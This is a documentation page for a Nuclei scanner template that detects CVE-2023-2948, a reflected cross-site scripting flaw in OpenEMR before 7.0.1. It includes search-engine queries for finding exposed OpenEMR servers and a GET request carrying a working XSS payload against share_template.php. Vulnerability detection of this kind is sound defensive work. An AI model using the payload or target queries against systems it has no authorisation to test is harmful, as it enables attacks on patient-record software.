OpenEMR < 7.0.1 - Cross-Site Scripting
ID: CVE-2023-2948
Severity: medium
Author: ritikchaddha,princechaddha
Tags: cve,cve2023,xss,openemr,open-emr
Description
Section titled “Description”Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.
YAML Source
Section titled “YAML Source”id: CVE-2023-2948
info: name: OpenEMR < 7.0.1 - Cross-Site Scripting author: ritikchaddha,princechaddha severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1. reference: - https://huntr.com/bounties/3842486f-38b1-4150-9f78-b81d0ae580c4 - https://github.com/openemr/openemr/commit/af1ecf78d1342519791bda9d3079e88f7d859015 - https://nvd.nist.gov/vuln/detail/CVE-2023-2948 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2948 cwe-id: CWE-79 epss-score: 0.0031 epss-percentile: 0.69965 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: open-emr product: openemr shodan-query: - http.favicon.hash:1971268439 - http.html:"openemr" - http.title:"openemr" fofa-query: - app="OpenEMR" - body="openemr" - title="openemr" - app="openemr" - icon_hash=1971268439 google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr
http: - method: GET path: - "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save</span>")' condition: and# digest: 4a0a00473045022100f64bb8eea425ae09346c7bce82e9a492d19823bdf4f50ab3cebcb858546f7cd6022044e302e330e7e0658c4e8ca1841e9f54cb1f93bad1290df181294f040fbc1b8f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2948.yaml"